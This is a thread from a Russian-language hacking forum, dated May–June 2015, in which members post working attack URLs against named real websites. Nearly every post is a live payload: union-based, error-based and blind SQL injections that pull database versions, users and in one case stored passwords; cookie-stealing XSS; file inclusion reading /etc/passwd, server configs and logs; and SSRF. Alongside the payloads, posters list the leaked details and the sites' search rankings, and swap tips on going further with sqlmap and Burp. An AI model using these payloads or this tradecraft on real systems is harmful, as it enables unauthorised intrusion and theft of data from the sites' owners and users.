http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%2 8*%29%2cconcat%28%28select%20concat%28version%28%2 9,user%28%29%29%20from%20information_schema.tables %20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x %20from%20information_schema.tables%20group%20by%2 0x%29a%29and%27

это error-base

smirk
19.05.2015, 21:01
↑ (https://antichat.live/posts/3849168/)
лично этой теме дублей нет


К примеру:

https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:spectehsnab.ru (https://www.google.com/search?q=site%3Aantichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:spectehsnab.ru)

https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:mmpris.ru (https://www.google.com/search?q=site%3Aantichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:mmpris.ru)

nopony
20.05.2015, 02:22
http://www.unimarkt.at/filialen/detailinfo/?no_cache=1&single_uid=-1+UNION SELECT 1,2,3,4,5,6,7,8,(select password from fe_users limit 0,1),10,11,12,13,(select usergroup from fe_users limit 0,1),15,16,17,18,19,20,21,22,(select username from fe_users limit 0,1),24,25,26,27

private_static
20.05.2015, 02:37
http://bonnika27.com/girl.php?id=-11+UNION+SELECT+1,2,3,4,5,user(),version(),8,9,10 (http://bonnika27.com/girl.php?id=-11+UNION+SELECT+1,2,3,4,5,user%28%29,version%28%29 ,8,9,10)

вес:bonnikac_user@localhost

грудь:5.1.73-cll

R3hab
20.05.2015, 11:11
http://www.childrensgarden.dk/curriculum.php?id=5 union select 1,group_concat(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES (http://www.childrensgarden.dk/curriculum.php?id=5%20union%20select%201,group_con cat(TABLE_NAME),3%20FROM%20INFORMATION_SCHEMA.TABL ES)


5.5.29-0ubuntu0.12.04.1

childensgarden@localhost

childrensgarden_dk



http://www.eupraxis.it/curriculum.p...ncat(version(),0x3a,user(),0x3a,dat abase()),8 (http://www.eupraxis.it/curriculum.php?id=-5%20union%20select%201,2,3,4,5,6,group_concat(vers ion(),0x3a,user(),0x3a,database()),8)


5.5.42-37.1-log

Sql533637@62.149.130.42

Sql533637_1

Bezlishke
20.05.2015, 13:58
↑ (https://antichat.live/posts/3849854/)
dsn: 'mysql:host=localhos -Если я не ошибаюсь, то это ключевая строка


Суть вопроса была не в этом.


http://www.abrasifs-friess.com/produit.php?id=999.9+union+select+1,version%28%29+--+

5.1.73-2+squeeze+build1+1-log

abrasifsbase

abrasifsbase@10.0.65.161

Cassie)
21.05.2015, 16:25
Слепые SQL

nightclub-spb.ru/show_club.php?id=115 (https://vk.com/away.php?utf=1&to=http%3A%2F%2Fnightclub-spb.ru%2Fshow_club.php%3Fid%3D115)' AND substring(@@version, 1, 1)='5

tushinec.ru/index.php?news_read=1310 (https://vk.com/away.php?utf=1&to=http%3A%2F%2Ftushinec.ru%2Findex.php%3Fnews_rea d%3D1310)' AND substring(@@version, 1, 1)='5

Cassie)
21.05.2015, 18:34
XSS http://tigercraft.org/index.php/forumbb/search.php?keywords=">alert() (http://tigercraft.org/index.php/forumbb/search.php?keywords=%22%3E%3Cscript%3Ealert%28%29% 3C/script%3E)

Егорыч+++
21.05.2015, 18:42
↑ (https://antichat.live/posts/3850378/)
XSS
http://tigercraft.org/index.php/forumbb/search.php?keywords=">alert() (http://tigercraft.org/index.php/forumbb/search.php?keywords=%22%3E%3Cscript%3Ealert%28%29% 3C/script%3E)


Пассивные xss тут надо публиковать с описанием того как её можно использовать на уязвимом ресурсе.

private_static
21.05.2015, 18:50
.SpoilerTarget" type="button">Spoiler: инклуд


http://www.antiled.biz/index.php?lang=ru&menu=ss/../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

R3hab
21.05.2015, 19:48
http://www.roadarmor.com/full-news.php?id=-5 union select 1,2,version(),4,5,6,7 (http://www.roadarmor.com/full-news.php?id=-5%20union%20select%201,2,version(),4,5,6,7)


PR 2

AR 950876

5.0.95

Шниперсон
21.05.2015, 23:53
http://www.additivealert.com.au/productdetail.php?pid=3+union+select+1,2,version() ,4,5,6,7,8 (http://www.additivealert.com.au/productdetail.php?pid=3+union+select+1,2,version%2 8%29,4,5,6,7,8)

ще я имею задать вопрос ! Как их кошерно искать ???

R3hab
22.05.2015, 13:57
quaoar.su/index.php?article_id=7%20union%20select%20concat(u ser(),0x3a,database(),0x3a,version())&chapter_id=6&volume_id=1


quaoarsu@localhost:quaoarsu:5.5.40-log


travel-rhodes.com/article.php?article_id=-7%20union%20select%201,2,3,concat(user(),0x3a,data base(),0x3a,version()),5,6,7,8,9--+f



ttrhodes_mar@localhost:ttrhodes_rhodes:5.1.73-cll

PR4

R3hab
23.05.2015, 17:58
fbc.scuegypt.edu.eg/fixed.php?id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6 (http://www.fbc.scuegypt.edu.eg/fixed.php?id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6)


gisUsr@localhost:gis:5.0.67-community-nt

PR2



mormonlit.byu.edu/lit_work.php?w_id=-8%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5


ldslit@localhost:ldslit:5.5.39

PR4

kingbeef
24.05.2015, 03:47
XSS


https://poisk.ngs.ru/?q=\x3C\x2Ftitle\x3E\x3Cscript\x3Ealert\x28\x27kin gbeef\x27\x29\x3C\x2Fscript\x3E&region=50&mode=2&url=d3d3LmNvZGVuZXQucnU=

Rypjaer
25.05.2015, 09:12
http://www.dutchaero.nl/index.php?catid=3&id=-7%20union%20select%201,2,3,4,concat%28user%28%29,0 x3a,database%28%29,0x3a,version%28%29%29,6--



https://www.althorp.com/visits_giftshop_detail.php?catid=-1%27+or+1+group+by+mid%28user%28%29,rand%280%29|0, 64%29+having+avg%280%29+--+



http://www.parskado.com/category.php?CATID=2%20union%20select%20concat%28u ser%28%29,0x3a,database%28%29,0x3a,version%28%29%2 9,2--+-

Filipp
25.05.2015, 16:02
Sql-inj (Blind)


http://erobank.ru/section/if(now()=sysdate(),sleep(0),0)/')%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))) nSVA)%20AND%20('BUui'='BUui'XOR(if(now()=sysdate() ,%20sleep(0),0))OR'%22XOR(if(now()=sysdate(),sleep (0),0))OR%22/

Filipp
26.05.2015, 18:12
Долго думал, выкладывать ли этот сайт, все таки поделюсь. Довольно интересный инет магазин, с кучей полезных данных. Скуля слепая, поэтому руками крутить и не брался. Легко раскручивается sqlmap'ом:


http://autoforsazh.ru/battery-search/?battery_brand=1&battery_capacity=;&battery_cold_start_current=;&battery_polarity=(select(0)from(select(sleep(0)))v )/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&items_per_page=36&item_part=&order=asc&request_url=battery-search&search_type=battery_param&size_height=1&size_length=1&size_tolerance=1&size_width=1&sort=price

SQL-inj (Blind):


http://kharkov.ua/poisk/searchresults.php3?category=395%20AND%203*2*1%3d6% 20AND%20601%3d601&mode=2

XSS:


http://kupitraf.com/index.php?type=1%22%3E%3Cscript%3Ealert%28document .cookie%29%3C/script%3E

zigen
26.05.2015, 18:44
SQLi


akulof.ru/modules/shop/category.php?id=-26 UNION ALL SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database() ,version()),6,7 --

R3hab
27.05.2015, 19:41
alvora.lt/jobs.php?id=-7'%20union%20select%201,2,3,concat(user(),0x3a,dat abase(),0x3a,version())--+f


ТИЦ10 PR4

alvora_web_vart@localhost:alvora_database:5.5.39-cll-lve


volumeseattle.com/jobs.php?id=-7%20union%20select%201,concat(user(),0x3a,database (),0x3a,version())--+f


PR3

volumeseattle@184.168.27.206:volumeseattle:5.0.96-log


offestival.com/top.php?id=-2%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18&lang=en


PR4

offestiv_vasco@localhostffestiv_ffo:5.0.96-community-log

Rosso
29.05.2015, 01:43
http://zabinfo.ru/person.php?pageid=person&idperson=-266 union select 1,user(),version(),4,database(),6,7,8,9,10,11,12,1 3;%00

User: zabftp@localhost

Version: 5.1.48-log

Database: zia_news

ТИЦ: 2100

PR: 4


http://museumpereslavl.ru/event.php?id=-377 union select 1,group_concat(user(),0x3c62723e,version(),0x3c627 23e,database()),3,4,5,6,7,8,9--+

User: u184264@10.8.3.230

Version: 5.5.35-1+wheezy1+mh1-log

Database: u184264

ТИЦ: 190

PR: 4


http://www.ukvz.ru/catalogue/view.php?id=-81' union select 1,2,3,4,group_concat(user(),0x3c62723e,version(),0 x3c62723e,database()),6,7,8,9,10,11,12,13,14,15,16--+&ggid=1&flag=0

User: ukvz@localhost

Version: 5.1.73-log

Database: ukvz

ТИЦ: 100

PR: 4

Rypjaer
29.05.2015, 02:55
SQLi


http://www.barryowen.com/toys.php?catID=14&subCatID=-49+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28 %29,0x3a,database%28%29,0x3a,version%28%29%29,11,1 2,13,14,15,16+--+



http://www.createwindow.com/store/crystals/index.php?CatID=-12+or+1+group+by+mid%28user%28%29,rand%280%29|0,64 %29+having+avg%280%29+--+



http://wpcreek.com/products.php?catid=101+union+select+1,2,3,concat%2 8user%28%29,0x3a,database%28%29,0x3a,version%28%29 %29,5,6,7+--+-

Rosso
29.05.2015, 15:26
http://www.ck-oda.gov.ua/index.php?article=-254 union select 1,concat(0x3c666f6e7420636f6c6f723d7265643e,0x3e3e 20496e6a65637420627920526f73736f203c3c,0x3c2f666f6 e743e,0x3c62723e,0x557365723a,user(),0x3c62723e,0x 56657273696f6e3a,version(),0x3c62723e,0x4461746162 6173653a,database(),0x3c62723e),3,4--+

User: oda@localhost

Version: 5.1.60

Database: oda

ТИЦ: 1200

PR: 5

Babadyc
29.05.2015, 17:33
http://mehfilentertainment.com/even...mn_name,3,4,5+from+information_schema.colum ns (http://mehfilentertainment.com/events.php?id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns)

http://www.astorialic.org/events.ph...5,6,7,8,9,10+from+information_schema.t ables-- (http://www.astorialic.org/events.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_schema.tables--)

http://www.essaygifts.co.za/catalog...ame,3,4,5,6+FROM+information_schema.colu mns-- (http://www.essaygifts.co.za/catalogue-list.php?id=-1+union+select+1,column_name,3,4,5,6+FROM+informat ion_schema.columns--)

http://www.editionsdusandre.com/boo...,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1 (http://www.editionsdusandre.com/book_details.php?id=-1+union+select+1,2,group_concat(version(),user()), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31)

http://www.wailana.com.au/catalog/p...,7,8,9,10,11+from+information_schema.tables-- (http://www.wailana.com.au/catalog/product.php?pid=1+union+select+1,2,3,4,group_conca t(table_name),6,7,8,9,10,11+from+information_schem a.tables--)

faza02
29.05.2015, 17:51
Большая просьба не постить по одной уязвимости в одном сообщении. Если с Вашего поста в теме никто не писал, отредактируйте. Не стоит думать, что так вы получите больше репутации

Еще совет: если это SQL, указывайте версию. Иногда пригождается проверить работу какого-либо вектора. Также, не забывайте обрамлять тегами CODE

BabaDook
31.05.2015, 00:09
Что-то я пока ничего не придумал, что с ним делать


http://ankontr.if.ua/?a_id=6395&page=../../../../../../../../../../etc/passwd%00&type=info

Mister_Bert0ni
31.05.2015, 01:09
Сосдай пейлоад с возможными путями /threads/324564/ (https://antichat.live/threads/324564/) и пройтись Burp Suite в Intruder-e

Вот конфиг апача


http://ankontr.if.ua/?a_id=6395&page=../../../../../etc/apache2/apache2.conf%00

MySQL


http://ankontr.if.ua/?a_id=6395&page=../../../../../%2fetc%2fmysql%2fmy.cnf%00

Rosso
31.05.2015, 02:21
http://www.keuka.edu/apps/m_directory/person.php
?id=-890' union select 1,2,concat(0x3c666f6e742020636f6c6f723d22726564222 0666163653d2247656f72676961223e,0x3e3e20496e6a6563 7420627920526f73736f203c3c,0x3c2f666f6e743e3c62723 e,0x557365723a20,user(),0x3c62723e,0x56657273696f6 e3a20,version(),0x3c62723e,0x44617461626173653a20, database()),4,5,6,7,8,9,10,11,12--+

User: keukawe_www@localhost

Version: 5.1.72-ius

Database: keukawe_directory 6 7

ТИЦ: 10

PR: 6

Mister_Bert0ni
31.05.2015, 02:34
↑ (https://antichat.live/posts/3853630/)
это я знаю ))




http://ankontr.if.ua/?a_id=6395&page=../../../../../../var/log/lastlog�
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/run/utmp�
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/wtmp� -- этот пишет логин и ip и упоминает ftpd.Стоит попробывать конект через ftpd и качестве логина попробовать указать .
http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/xferlog� - довольно большой лог.Гугл говорит что это лог vsftpd сервера

Filipp
31.05.2015, 15:49
XSS


http://24log.ru/join.php?c=4&d=6&project_id=&register=yes&sth=0&t=41-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%2 8document.cookie%29%3C/ScRiPt

Babadyc
01.06.2015, 02:05
еще

dbo464376343@74.208.16.31

5.1.73-log


http://www.southernpowerlifting.com/form.php?id=-1+union+select+group_concat(table_name),2+from+inf ormation_schema.tables—+

Filipp
01.06.2015, 09:13
XSS


http://russki-mat.net/argot/poisk.php?c=lem&q=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert %28123%29%3C/ScRiPt%3E

Filipp
01.06.2015, 20:11
SQL-inj (Error Based)

Banner: '5.1.41-log'


http://viko-ias.ru/o_kompanii/novosti/?ajax=1&tag=-5118%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x7 1706b7a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28 %29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0 x7162627071%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVI NG%20MIN%280%29%23)%2cconcat((select%20concat(CHAR (52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(78)%2cCHAR(121) %2cCHAR(78)%2cCHAR(107)%2cCHAR(103)%2cCHAR(54)%2cC HAR(66)%2cCHAR(57))%20from%20information_schema.ta bles%20limit%200%2c1)%2cfloor(rand(0)2))x%20from%2 0information_schema.tables%20group%20by%20x)a)and% 22

Filipp
03.06.2015, 00:19
XSS:


http://telenet.dn.ua/check/index.php/%22%3E%3Cscript%3Ealert%28%22Filipp%20Mustang%22%2 9%3C/script%3E

Babadyc
03.06.2015, 18:29
http://onlinederabassi.com/check.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14-- (http://onlinederabassi.com/check.php?id=-1+union+select+1,pwd,adminname,4,5,userid,7,8,9,10 ,11,12,13,14+from+adminlog--)

Filipp
03.06.2015, 21:23
LFI:


http://krivbassham.org.ua/index.php?action=views&getbg=../../../../../../../../../../etc/passwd&page=blogs

XSS:


http://iona.kiev.ua/photo.php?menu=misc%27%22%28%29%26%25%3Cacx%3E%3CS cRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&photo=troitsa1520.jpg

Filipp
05.06.2015, 14:26
SQL-inj (Blind)


http://gothart.com.ua/stat/book/show/?id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Cdxh)

Bris
06.06.2015, 00:04
www.tacamateurs.com (http://www.tacamateurs.com)


http://www.tacamateurs.com/cgi-bin/signup/signup3.pl?famaction=form&network=TAC1&tacid=221%27+and(select+1+from(select+count(*),con cat((select+(select+database())+from+%60informatio n_schema%60.tables+limit+0,1),floor(rand(0)*2))x+f rom+%60information_schema%60.tables+group+by+x)a)+ and+%271%27=%271

Filipp
06.06.2015, 12:10
SSRF:


http://fcgoverla.uz.ua/lib/imageresize.php?cache=1&h=375&imgurl=ftp://test.antichat/image.ssrf&w=500

Rosso
06.06.2015, 23:51
http://dazo.gov.ua/index.php?id=query&sid=-15 union select concat(0x3c623e3c666f6e7420636f6c6f723d72656420666 163653d47656f726769613e,0x3e3e496e6a65637420627920 526f73736f203c3c,0x3c62723e,0x3c2f623e3c2f666f6e74 3e,0x557365723a20,user(),0x3c62723e,0x56657273696f 6e3a20,version(),0x3c62723e,0x44617461626173653a20 ,database())--+

User: dazo_yura@localhost

Version: 5.5.41-0ubuntu0.14.04.1

Database: dazo_dazo

ТИЦ: 20

PR: 4

Bris
07.06.2015, 04:08
www.the-ice-man.co.uk (http://www.the-ice-man.co.uk)


http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu

Префикс таблиц: 'theqice_'

inurl:"prodisp.php?prodcatind"

Чет я не понял, пофиксили чтоли уже;/

Filipp
11.06.2015, 13:18
SQL-inj


http://chorus.kh.ua/album.php?id=-1+UNION+SELECT+1,user(),3+--+

nikonic
11.06.2015, 13:31
http://www.ruslang.ru/agens.php?id=999999.9'+union+all+select+1,2,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),4,5,6,7,8+--+

ТИц 1400

PR 5

5.5.41-MariaDB


http://www.komod.ru/garniture/search/?query=99'+or+1=(sElEcT+1+fRoM(sElEcT+count(*),cOn CaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x21 7e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1

ТИц 900

PR 3

Li 6к трафа

5.6.15-63.0-log


http://dynatone.ru/newslist.php?ngr=2'+and(sElEcT+1+fRoM(sElEcT+count (*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE (),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+f RoM+information_schema.tAbLeS+lImIt+0,1),floor(ran d(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+ x)a)+and+'1'='1

ТИц 1700

PR 3

Li 3к трафа

5.1.63-0+squeeze1


http://www.auto-magnitola.ru/auto/index.php?firma=9'+union+all+select+concat_ws(0x3a ,version(),database(),user(),@@version_compile_os) ,2,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+


ТИц 450

PR 4

Alexa 300к

5.5.33-log (http://www.auto-magnitola.ru/auto/model.php?mode=5.5.33-log:wwwmusiccarru:musiccar@localhost:FreeBSD9.1)

Li 5к трафа


domkom.ru/admin/stuffs_add.php?id_type=7'+union+select+concat_ws(0 x3a,version(),database(),user(),@@version_compile_ os),2,3,4,5,6+--+

ТИц 275

PR 3

5.6.15-63.0-log

nikonic
14.06.2015, 13:17
http://www.province.ru/doska/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+

CMS:Joomla

ТИц 1900

PR 5

LI скачет, но в основном 20к уников в день

5.1.49-3

kingbeef
14.06.2015, 14:04
↑ (https://antichat.live/posts/3858690/)
Хватит RU/UA ломать. В других доменных зонах есть миллионы сайтов.


Как скажете.

http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k (http://iunisa.unisa.it/podcast-1061'+and+0+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12,13,14,15,16--+k)

Файл скачивается

Take_IT
16.06.2015, 19:41
↑ (https://antichat.live/posts/3858701/)
Как скажете.
http://iunisa.unisa.it/podcast-1061...,4,5,6,7,version(),9,10,11,12,13,14,15,16--+k (http://iunisa.unisa.it/podcast-1061'+and+0+union+select+1,2,3,4,5,6,7,version(),9 ,10,11,12,13,14,15,16--+k)
Файл скачивается


по моему следует запретить постить тут уязвимости тем, кто давно может делать это в специально отведенных темах что висят в профильных разделах


Регистрация: 8.04.2010
Сообщения:
385 (https://antichat.live/search/member/user_id/120216/)


может ты уже перерос песочницу??

Take_IT
17.06.2015, 18:03
↑ (https://antichat.live/posts/3859779/)
Только вот я не понимаю где будет писать/отображать версию БД?


в файле который ты скачал:

1) в названии файла 5.1.23-rc-community-log.txt

2) ошибка с раскрытием в тексте файла



Warning: filesize() [function.filesize]: stat failed for
5.1.23-rc-community-log
in /var/www/html/iunisa/pod_proxy.php on line 166

Notice: Undefined index: HTTP_REFERER in /var/www/html/iunisa/pod_proxy.php on line 26

Notice: Undefined index: cat_event in /var/www/html/iunisa/pod_proxy.php on line 180

Warning: readfile(
http://iunisa.unisa.it/
5.1.23-rc-community-log
) [function.readfile]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in /var/www/html/iunisa/pod_proxy.php on line 188

Filipp
19.06.2015, 16:57
XSS:


http://www.62.ua/banks/type/1?bank_id=1&income_statement=1&sum=10000%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3 Ealert%28document.cookie%29%3C/ScRiPt%3E&term=1

SUHAR1K
20.06.2015, 17:24
http://www.shkola-smertina.ru/tournaments/?season=">alert(100) (http://www.shkola-smertina.ru/tournaments/?season=%22%3E%3Cscript%3Ealert%28100%29%3C/script%3E)

Rosso
20.06.2015, 21:56
http://www.hafen-fotos.de/keyphoto/viewphoto.php?foto=49200703071515.jpg&userhelp=on&helpid=-86 union select 1,concat(0x3c666f6e7420636f6c6f723d726564206661636 53d47656f726769613e,0x3c623e,0x3e3e20496e6a6563742 0627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0 x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657 273696f6e3a20,version(),0x3c62723e,0x4461746162617 3653a20,database()),3--+



User: web310@localhost

Version: 5.1.73

Database: usr_web310_1

PR: 3


http://www.innoworks.org/newinno/bios2.php?staff_id=-64 /*!50000union*/ select 1,concat(0x3c666f6e7420636f6c6f723d726564206661636 53d47656f726769613e,0x3c623e,0x3e3e20496e6a6563742 0627920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0 x3c62723e,0x557365723a20,user(),0x3c62723e,0x56657 273696f6e3a20,version(),0x3c62723e,0x4461746162617 3653a20,database()),3,4,5,6,7,8,9,10,11,12,13,14--+




User: innowork_admin@localhost

Version: 5.5.41-cll-lve

Database: innowork_people

PR: 5


http://www.arndt-sowi.de/webquest/show.php?id=-40' union select concat(0x3c666f6e7420636f6c6f723d72656420666163653 d47656f726769613e,0x3c623e,0x3e3e20496e6a656374206 27920526f73736f203c3c,0x3c2f623e3c2f666f6e743e,0x3 c62723e,0x557365723a20,user(),0x3c62723e,0x5665727 3696f6e3a20,version(),0x3c62723e,0x446174616261736 53a20,database()),2,3,4,5,6,7,8,9,10,11--+



User: web33@localhost

Version: 5.5.42

Database: usr_web33_2

PR: 3


http://www.solo-musica.de/show.php?id=-4' union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d72656420666 163653d47656f726769613e,0x3c623e,0x3e3e20496e6a656 37420627920526f73736f203c3c,0x3c2f623e3c2f666f6e74 3e,0x3c62723e,0x557365723a20,user(),0x3c62723e,0x5 6657273696f6e3a20,version(),0x3c62723e,0x446174616 26173653a20,database()),5--+



User: dbo354230028@195.20.225.33

Version: 5.1.73-log

Database: db354230028

PR: 3


http://www.lernort-labor.de/events.show.php?ID=-153 union select 1,2,3,4,5,6,concat(0x3c666f6e7420636f6c6f723d72656 420666163653d47656f726769613e,0x3c623e,0x3e3e20496 e6a65637420627920526f73736f203c3c,0x3c2f623e3c2f66 6f6e743e,0x3c62723e,0x557365723a20,user(),0x3c6272 3e,0x56657273696f6e3a20,version(),0x3c62723e,0x446 17461626173653a20,database()),8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25--+



User: lerjxdou@localhost

Version: 4.1.26

Database: usrdb_lerjxdou

PR: 6

nikonic
21.06.2015, 12:43
http://www.leong-leong.com/news.php?id=999999.9+union+all+select+1,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),3,4,5

5.1.72-REL14.10

PR:4


https://www.naturesplus.com/sourceoflife/products/productDetail.php?id=999999.9+union+all+select+con cat_ws(0x3a,version(),database(),user(),@@version_ compile_os),2,3,4,5,6

5.1.70-log

PR:4


http://pharm.buu.ac.th/News_view.php?id=999999.9'+union+all+select+1,2,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),4,5,6,7+and+'0'='0


5.0.45

PR:4

Filipp
23.06.2015, 14:48
SQL-inj:


http://bezgazet.dp.ua/?act=mode&mode=0%22%20AND%20%28SELECT%204782%20FROM%28SELECT %20COUNT%28%2A%29%2CCONCAT%280x717a707671%2C%28MID %28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29 %2C0x20%29%29%2C1%2C50%29%29%2C0x717a706a71%2CFLOO R%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SC HEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND% 20%22ClCs%22%3D%22ClCs

nikonic
23.06.2015, 22:16
http://www.alternativenergia.hu/wp-content/themes/alternativenergia/tudjmegtobbet.php?catid=85+or+1=9+union+all+select +concat_ws(0x3a,version(),database(),user(),@@vers ion_compile_os),2,3,4,5,6,7,8--

PR - 5

5.5.35-0+wheezy1-log

вывод в исходном коде

nikonic
25.06.2015, 00:18
Вкусности-приятности


http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x 3a,version(),database(),user(),@@version_compile_o s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'=' 0

